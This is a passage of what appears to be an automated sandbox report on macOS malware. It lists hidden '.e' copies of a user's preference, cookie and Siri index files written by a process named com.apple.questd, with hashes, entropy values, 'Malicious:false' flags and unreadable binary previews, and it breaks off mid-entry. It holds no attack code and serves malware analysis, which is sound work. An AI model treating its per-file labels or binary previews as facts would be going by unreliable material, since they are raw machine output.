                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesdataTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7072091905035545
                                                                                                    Encrypted:false
                                                                                                    MD5:C4CAC6C0532EC0B276FC1168A73FD224
                                                                                                    SHA1:DF43ADE54F0BE3762033B2F6C227BF9FEFB0E001
                                                                                                    SHA-256:618FC798172F59E33DD7A9E82D84C163DD1C38585453EAC2DF0A35CC58C88324
                                                                                                    SHA-512:7384EF9A2422D1F36528A99384D386D0821C6BC40994916E7CB2D5E608FD87183B0CD5B327513F4C71FF24952259267A042D14F4BEBD11B53DAC95C04CF04BE2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesedgeTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.702863440077437
                                                                                                    Encrypted:false
                                                                                                    MD5:035342ED3B456252D262803F434A4763
                                                                                                    SHA1:C4F54A0E05A3CC16E921EA269A1A827206EE36C2
                                                                                                    SHA-256:1FB7861514E38E939379EBA8DFEECE351605B5A6EBE9B0B210A1F778360F572A
                                                                                                    SHA-512:6F89A5EA512D771EAA8B71AEFEAD9532F95524640E7ADB097A3DADE652FA6BE3E4880DD65C1F432ECBE05121F22F851A53C19FF07243472BA369303086282367
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesfinalTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7068895937625883
                                                                                                    Encrypted:false
                                                                                                    MD5:332B7FFADB7546127CCE6D9030EA2C03
                                                                                                    SHA1:B4CDD9DF7610197DDA7A5DC18157298895390A81
                                                                                                    SHA-256:EDC61B2DC333023A7F766067C474018A3BC7E21BC8E46AEBF41723B789DF8EF6
                                                                                                    SHA-512:395DA43CD6BF66ECC19DE2D6AB14757F4000E6CFF99407A41015194FADDCF11288D0A0046502C6B302A5F9B39B8ACCD35E1FF951C978A02CB266B502F7FFC0D4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesdataTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4362
                                                                                                    Entropy (8bit):7.549776608397064
                                                                                                    Encrypted:false
                                                                                                    MD5:4B47386884FCB21FC8A6CD6CB69367DF
                                                                                                    SHA1:4C1FF27CB282F7B85735858F0D4BFD055E46BC66
                                                                                                    SHA-256:432D12D090C865B6427E2393DB87FFF4FDA6C391289AD6FC05DF757D068EF1D1
                                                                                                    SHA-512:630B59C487E00841347D64197E9A086B8E493D924DB067114BA2E175310B7DE4DED5486DDE92DAEC1D3FC1858C85D1FD943A9149D262E1B9BEB4988F9D18E896
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .U..q.V...4|z9.(..4|z9.(..4|z9.(G...k....z.a)YmC.z.a)YmC.z.a)YmC.z.a)YmCQ(.-..........SU..."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......."......n|..~?}g........h/1...}g......&......d:.....q.Z7......<...T.%.<...T.%.<...T.%.<...T.%.<...T.%.<...T.%...-.g...e..K|.,Ce..K|.,Ce..K|.,Ce..K|.,Ce..K|.,Ce..K|.,Ce..K|.,Ce..K|.,Ce..K|.,Ce..K|.,Ce..K|.,Ce..K|.,CQ....bYC.J..Yh....J....C..J....C..J....C..J....C..J....C..J....C*Y.~.5G...J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C..J....C.....'.2g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.g;....m.
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesedgeTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6018
                                                                                                    Entropy (8bit):7.547258136016493
                                                                                                    Encrypted:false
                                                                                                    MD5:EA5F47F90E517E40B6BE40803C5746AC
                                                                                                    SHA1:0017A71938D73E82D8492EEB3FF6193646CD1872
                                                                                                    SHA-256:975FD85A6F04351E856C2B461D0678BB1F38E26669F254D8BC99357F00D0200F
                                                                                                    SHA-512:5FB636BA0427FF49AADAF0986F222A2EB2B829BF6593657C4610E39F93388EEEF64D94E48D79A2A7890F0AAEA09F40EC155CCB7F5A156551D061441C51F429A6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...[iv.....[iv.........ZV.w...A.V.w...A...0..#..oJ......oJ......oJ......oJ......./x'j...oJ......oJ......oJ......oJ......oJ......oJ......oJ......oJ......oJ......oJ......oJ......oJ......oJ......oJ.............U4x(..........O.......O.......<.^.v...6G..v...6G..v...6G..v ..h.y..._..e.E...Q...R......H...F.9.....F.9.....F.9.....F.9.....F.9..C)%........F.9.....F.9.....F.9..,{C....k..U......K|.*Wm.........zXRy...=zXRy...=zXRy...=Q$.(......[6..n...[6..n...[6..n...[6..n.5t.d.........*y......*y......*y.M...s....c."sg.D.c."sg.D.c."sg.D.c."sg.D.c."sg.D.c."sg.D.c."sg.D.c."sg.D.....?Mb...!lg.....!lg..... ..}X. ...._S^..{..m.^..{..m.^..{..m.^..{..m.,.Z.G.e....&0(+o...&0(+oO0.....0.=.../.L...C.>d....C.>d....C.>d.,m....>...2\?F.\....E.*..~..6.F=M'o..I..&....:..&....:..&....:..&....:..&....:../2HY..1.....4.......4.......4.......4.......4.......4.......4...4y.75^.E....4.......4.......4.......4.......4.......4...C/..J..F..%H......%H......%H......%H......%H......%H....m.`...^x..~.......~.......~.......~.....
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesfinalTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3170
                                                                                                    Entropy (8bit):7.176189976186718
                                                                                                    Encrypted:false
                                                                                                    MD5:AF7F7A2F74930569A8A5FF0D6E09C484
                                                                                                    SHA1:3B4536F861FA5023EF04F0A48EC9D7117E02D4B8
                                                                                                    SHA-256:522187790418FD92B720043072ED301E86605894AE3DBC892CA6D521F2C0E160
                                                                                                    SHA-512:01BE3EB5B29CC418EE3A2883B36D76880125E398FC653D6749C825A721FDCE8ACEC0A7B15B986FE00D4EA265585F57F403AE991F5D482099B99DD0153ED31D6C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ......3..Q.../...Q.../...Q.../..$..^6f`....4.x.....4.x.....4.x.....4.x....Fo.|'WL.p6g5.G..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^..d..N)^.....\.@.T..CoD. \.PZ.w5.T..CoD..\.....T.Z.Y....~.]o..b..../.?...../.?...../.?...../.?...../.?...../.?...I.I..^._.....E._.....E._.....E._.....E._.....E._.....E._.....E._.....E._.....E._.....E._.....E._.....E.1..wE.N".4.....A.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k!.K..'...2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.2.='..k.^..F....K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|..K..9Z|.
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesdataTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7060428537117835
                                                                                                    Encrypted:false
                                                                                                    MD5:FA8A6204E3664A689E5E18C68739A41C
                                                                                                    SHA1:FE811473FCD17671B16824CC6B5EF1F419F5B52F
                                                                                                    SHA-256:7720FE043CC101DEB16E53F5E6C0B923999476BA8761DFD746BE91A75E254798
                                                                                                    SHA-512:70D959DE8D6606867825EF456B85644B0A103C7FB267637AB37AB35AD424EBCC895C9B99D43EA8FFCD6600C903FBF1671B0211C2F2BC7439A2AF85665F32749E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesedgeTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.70636245045275
                                                                                                    Encrypted:false
                                                                                                    MD5:EFAE6ECA409685DD1C26BAFC6A947EB7
                                                                                                    SHA1:94C4064AB9E76A03A9690D70032EA139E0D5B039
                                                                                                    SHA-256:B9D9E2183C84A652C94672F9C27D25C5339A1D1EC05656ABFB144A1B62A8C9FB
                                                                                                    SHA-512:AD1EC1A646BEDED0EC6F345195A554D8B4D199CC6BDBE8D9C3F24D883D52F10916C7975D5936FD8A3847E033219C426B7B7F716FE4705220CF3EA51D8FDDFBDB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesfinalTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.70636245045275
                                                                                                    Encrypted:false
                                                                                                    MD5:EFAE6ECA409685DD1C26BAFC6A947EB7
                                                                                                    SHA1:94C4064AB9E76A03A9690D70032EA139E0D5B039
                                                                                                    SHA-256:B9D9E2183C84A652C94672F9C27D25C5339A1D1EC05656ABFB144A1B62A8C9FB
                                                                                                    SHA-512:AD1EC1A646BEDED0EC6F345195A554D8B4D199CC6BDBE8D9C3F24D883D52F10916C7975D5936FD8A3847E033219C426B7B7F716FE4705220CF3EA51D8FDDFBDB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/Library/Preferences/.com.apple.siri.media-indexer.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):458
                                                                                                    Entropy (8bit):5.732643495084279
                                                                                                    Encrypted:false
                                                                                                    MD5:0FD9CA74DF2872600F390705D04D033B
                                                                                                    SHA1:06C7436F284E66DD5DB88FE23DACF754B6820452
                                                                                                    SHA-256:809314BA332A95676711D6A45D495F94C3D0C4E7F5F8894E0996C719DF3B5576
                                                                                                    SHA-512:CC95324ED7B001808031ACF5C23BFBDFA11D02D7E5CC53A8735E9EAC74E9DF65D7481C4246BF34BF63928D6CACF62C6DB0053977B303F19D5ED326D45380AF91
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....m.~.Y....!....GLe...r...b.....................'M...=D......m+......`.n.<x....u...'...aq6........M.x.......&..N....|.. Q.c.8.3............V["....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.soagent/Data/Library/Preferences/.com.apple.messageshelper.AccountInfoController.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):458
                                                                                                    Entropy (8bit):5.6911160933186595
                                                                                                    Encrypted:false
                                                                                                    MD5:6F7F7010F40557311ED62BF8F09776F0
                                                                                                    SHA1:CE05D72A5EA8542481B5C39FDB731058DC728F9F
                                                                                                    SHA-256:D5DA3844298D8730E16F5624C917177038451D634F79AB26FDD99468D6CD8806
                                                                                                    SHA-512:3A8025DF1036CE8B9FA613FE11CB6E437F9F339B6681E98F94CAA6ACBA0488DED12B87199127D22FB8285A7C641C357E54DFAE126DBF86697FCD0F549790FA92
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9.....o;.e.9X<..*.......M3.l.P.....xM1.............+.u..GPg.hT...&.+gKl..X....FZ;a....EE.|.#.[..;.....M2...Y7...>..........;.....=Z....l...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.soagent/Data/Library/Preferences/.com.apple.messageshelper.AccountStatusController.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):402
                                                                                                    Entropy (8bit):5.330955582774576
                                                                                                    Encrypted:false
                                                                                                    MD5:0BF8FFE4207FA1869FCA6E496103BCBB
                                                                                                    SHA1:1B4D85FF2D8B2A1CCB7F493C9401FA5A8BC2D89F
                                                                                                    SHA-256:6DA525867FB6C1A2E066C10A3501F91B6C1988F1A4A4E073AD7D71E5F980A6F4
                                                                                                    SHA-512:87FA13BD45BF8523B6F3F322ABC2265E987A0C76DAA30A131F3CD6081E3F7F1821DA86938BE257D1D0DEB04C0EE44B3A182FE2202FCD731E53FE0BB74B498B16
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...:..~.tC..t..>.s....Kd.(..K.0{...(\.e/z..V.yT.-.{s<PM..ah...7....m=..!*A.L.D<.+........C.a................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.soagent/Data/Library/Preferences/.com.apple.messageshelper.AlertsController.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):506
                                                                                                    Entropy (8bit):5.952134653448706
                                                                                                    Encrypted:false
                                                                                                    MD5:E369633DA2DE0F4ECDC94471FA472BC5
                                                                                                    SHA1:E49E8B307D47165FCEA6E57A301EDCE7C7263BD4
                                                                                                    SHA-256:5F2B6B817233C2683251D69898A1FA303789E66FAD4B7A63B31EABAF9AE1D1DD
                                                                                                    SHA-512:4B2F2E8764221913148CE41439F964325B4B31364E11D9FC68F512802BBBBD17DE52185B2E08C31CE5A9E9A09E7E3A1016D84BBB13D03C3EF817194E59D4273F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...<f....R"..m0.p.....Y{..`....p.....e.k[[.{.+X'..(...c.>R0.(......]......^..C......Y...Om...![bf.\Q.....=..../\s8...=...?.q.0?...=y..E.Q.<S.............X.....2mv)....).7Ey.j............OV... .f..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.soagent/Data/Library/Preferences/.com.apple.messageshelper.FileTransferController.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):410
                                                                                                    Entropy (8bit):5.362190965084075
                                                                                                    Encrypted:false
                                                                                                    MD5:FCE42F3F95501B312CD11335B5B918B6
                                                                                                    SHA1:A983856EDB93F2DC6D9AEBFF88162D9EAA802C38
                                                                                                    SHA-256:7846452BD3A30F2AECD6AC0B08199AD561FAE21910BBD85E756F0249560FEC91
                                                                                                    SHA-512:7F71CA4947A5C94401C44ADB2AEE348CB44D4614A7FB9E94AD5176189F88C9BAD0BAE3527BFD10F553636F28EA78E5BB07B888C57BB06193921A9153C47EBDFA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..c.MW7..h..."..."{..E.C1.a.FKz........$..6.ml.Vik.Bx...nO.Q.V.r......|.. ......QY........ ....G...i................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.soagent/Data/Library/Preferences/.com.apple.messageshelper.MessageController.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):834
                                                                                                    Entropy (8bit):6.921584768139201
                                                                                                    Encrypted:false
                                                                                                    MD5:9DC8558436A38C085811FC7D6C769950
                                                                                                    SHA1:E5CD23EC400A5A54C37631966508119332CC5C96
                                                                                                    SHA-256:9669FB704145ADE1EF5DD6F126F55200113B5BC8C55D0BE5B0CB14ADE7FF22FE
                                                                                                    SHA-512:FACC5422399173E7FECB00D40C5BDE77B2A702EBC9FD47E06CDB3E8F9E7213CD832B4C21C346C5C13F0021949EFBF021ADF721D286076C4BCB1FD8845A9C532B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...Y5.!oL..1.Z..c..8.U........H....4c...P.~PX....7?...*......l._...w5.)!.0.....?...C.S.5b...jj.K.9.4Q...5......U..1m...0k.-v.....J..F..X.y...;6.`../zh.Z...=.................n4eg........G..-.7v...e..aP.....n4eg.U/....5.L............[.......>.Y;l..b.^.~...W.=.s...Q...W...h..R4..z....1...I.cg ....t{l...t..Ho....(....3_.u.......-....5!O.....4....E.....V~.>.........D3 .=....."..d...!R..W|~...W.=..l.....&W...h..R4..z.........p....b1...#......?pu6.........:..S.|._Guq.8....w..5ku......|.GU+.M..$..x....)..Ym...........P........................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Cookies/.com.apple.safari.cookies.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):730
                                                                                                    Entropy (8bit):6.715692316626423
                                                                                                    Encrypted:false
                                                                                                    MD5:2634A9BB1174FE7925780BBE9DED9064
                                                                                                    SHA1:DBF916EF586C090FF1A7879D92EF0713595C97CD
                                                                                                    SHA-256:AD8B1B5A511FEE302B4A26649A03C383DE9C5058F0F50B3FEEA5C222CAD2FCC3
                                                                                                    SHA-512:78F49F96E7C37C30B08C95C205537A701F10E9AFB8F49641F8DD1BB0E7A903D42D23F3447173D6425714F681D4691D4395F227A22C9487AC07A9B36F1D33EC9E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ......$...haL/..-..0..Rn...W......r..............A....._.G>.T.E.............e.....=Ka.|.BFc..N.......u4....l..G...`...*J...w(....f..K#2_..vg-....}..RQ.V.n...qj.:...P.........[?........z.>K.D.tV.1..G6.>....!........u.d.]rr....s..X...........b.....[..gWr\b..........X......(.8..,.0.2.4........?X&<',..6..a.......r.....$NY.&%......m<.O.T.E..P.......@.7R....Px...Q.v. ...e......Jq..?....Q.m.z..F.)....).7G.]/.2.~..........|.^.M%..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Cookies/.com.apple.spotlight.cookies.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1106
                                                                                                    Entropy (8bit):7.191343540088174
                                                                                                    Encrypted:false
                                                                                                    MD5:6C7AFE314D54EFA71BFCCC6588AA679C
                                                                                                    SHA1:4BF9E8F51DE78C95F9DB02EDD1DF7917E9863C84
                                                                                                    SHA-256:6BF8A201F3A54F24B4D2395298387FAFA6573C3FE3C199A91276C6A1E96D2099
                                                                                                    SHA-512:36453374C2905BB9654E2A742CD42A825A8C529A51EDE2D8D89841BF4872C145A51DEB211BA731C9EE1E73048ABA0467152AB03D8374F0B242E640485AF3D6F0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....fn..4..&y..`.N...R%a..N.:..u.`................u6....!.G..(....H.r...........5.z........'..9.gY=..An.~N;X.V........{/.d..............fl.......o.-w..F.x......(7..y.w...s/.\.'..E.......[$....p.!....G.V.....d.].+yyG[.G.9...G.:..M..%..........i.E..._$.'........p..5t...7...b.....[..gWr\b...........9....r ....B..o.......j...?X&<'...K..r2..k.D..9B..l,..\.s.DVT........+.'......JC(Bv.-.*.HfhTCbxr..zWv?u...\.FU.P...]..?..c..j...uq!.j..........QW...%.........bO..~.....[%.XF~o.zD.R>...@.....K..d.R.{.'?W.P.8.>\...>..B.?YN.#..........8....Iw. .......M.>x?d.]]..Z-|qoKA.i...4?..DAX.qS.w..w...>......1.......<..~5.E.bz.Hy.P.q..x../d'X..Uz...%..tV1........6.GA*X/0....O...=u.$.6D..g...!f..)9=(^..Q..H:...).....S.ovN^..N.}.L..B.H...7..a.......Q.J......W.89..U...5...0......j+_.{*..T...[.y..!...........%..."...!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...........................................
                                                                                                    /Users/ben/Library/FontCollections/.Fixed Width.collection.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2706
